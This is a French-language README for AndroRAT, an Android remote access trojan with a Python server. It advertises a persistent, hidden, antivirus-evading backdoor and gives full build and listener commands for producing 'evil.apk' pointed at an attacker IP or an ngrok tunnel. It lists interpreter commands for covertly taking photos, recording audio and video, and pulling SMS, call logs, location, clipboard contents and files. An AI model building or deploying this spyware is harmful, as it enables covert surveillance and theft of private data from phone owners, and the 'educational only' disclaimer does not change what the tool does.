AndroRAT

Avis de non-responsabilité : ce logiciel est destiné uniquement à des fins éducatives. Je ne suis pas responsable de toute utilisation malveillante de l'application.

AndroRAT est un outil conçu pour donner le contrôle du système Android à distance et en récupérer des informations. Androrat est une application client/serveur développée en Java Android pour le côté client et le Serveur est en Python.

AndroRAT fonctionne également sur Android 10 (Q) mais certaines commandes d'interprétation seront instables.

• Porte dérobée persistante complète
• Entièrement indétectable par n'importe quel scanner antivirus VirusTotal
• Icône invisible lors de l'installation
• APK léger qui fonctionne 24h/24 et 7j/7 en arrière-plan
• L'application démarre automatiquement au démarrage
• Peut enregistrer de l'audio, de la vidéo, prendre des photos à partir des deux caméras
• Parcourir les journaux d'appels et les journaux SMS
• Obtenez l'emplacement actuel, les détails de la carte SIM, l'adresse IP et l'adresse Mac de l'appareil

AndroRAT nécessite Python3 et JAVA (ou Android Studio)

 git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt

Lors du clonage du référentiel à l'aide de Git bash sous Windows, vous pouvez obtenir l'erreur suivante :

erreur : impossible de créer le fichier <nom de fichier> : nom de fichier trop long

En effet, Git a une limite de 4 096 caractères pour un nom de fichier, sauf sous Windows lorsque Git est compilé avec msys. Il utilise une ancienne version de l'API Windows et il existe une limite de 260 caractères pour un nom de fichier.

Vous pouvez contourner cela en définissant core.longpaths sur true .

git config --system core.longpaths vrai

Vous devez exécuter Git bash avec les privilèges d'administrateur.

• Pour obtenir le panneau de contrôle de l'application, composez *#*#1337#*#* (Pour l'instant, il n'y a que deux options Restart Activity et Uninstall )

Remarque : Pour utiliser cette fonctionnalité sur certains appareils, vous devez activer l'option display pop-up windows running in background à partir des paramètres.

• --build - pour construire l'apk Android
• --ngrok - pour utiliser le tunnel ngrok (sur Internet)
• --shell - obtenir un shell interactif de l'appareil

 Usage:
  python3 androRAT.py --build --ngrok [flags]
  Flags:
    -p, --port              Attacker port number (optional by default its set to 8000)
    -o, --output            Name for the apk file (optional by default its set to "karma.apk")
    -icon, --icon           Visible icon after installing apk (by default set to hidden)

 Usage:
  python3 androRAT.py --build [flags]
  Flags:
    -i, --ip                Attacker IP address (required)
    -p, --port              Attacker port number (required)
    -o, --output            Name for the apk file (optional)
    -icon, --icon           Visible icon after installing apk (by default set to hidden)

Ou vous pouvez créer manuellement l'apk en important le dossier Android Code dans Android Studio et en modifiant l'adresse IP et le numéro de port dans le fichier config.java, puis vous pouvez générer l'apk signé à partir d' Android Studio -> Build -> Generate Signed APK(s)

 Usage:
  python3 androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

Après avoir exécuté le mode shell , vous obtiendrez un interprète de l'appareil

Commandes pouvant s'exécuter sur l'interpréteur

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

Dans le shell sh, il y a quelques sous-commandes

    get [full_file_path]        --> donwloads the file to the local machine (file size upto 15mb)
    put [filename]              --> uploads the file to the android device

• Pour construire l'apk en utilisant ngrok qui définira également le listner : python3 androRAT.py --build --ngrok -o evil.apk

• Pour créer l'apk en utilisant l'adresse IP et le port souhaités : python3 androRAT.py --build -i 192.169.xx -p 8000 -o evil.apk

• Pour obtenir l'interpréteur : python3 androRAT.py --shell -i 0.0.0.0 -p 8000

• Générer un APK

• Quelques commandes d'interprétation

• Soutien Ngrok
• Configurer plusieurs clients
• Ajouter une commande de capture d'écran

AndroRAT est sous licence MIT, consultez la LICENCE pour plus d'informations.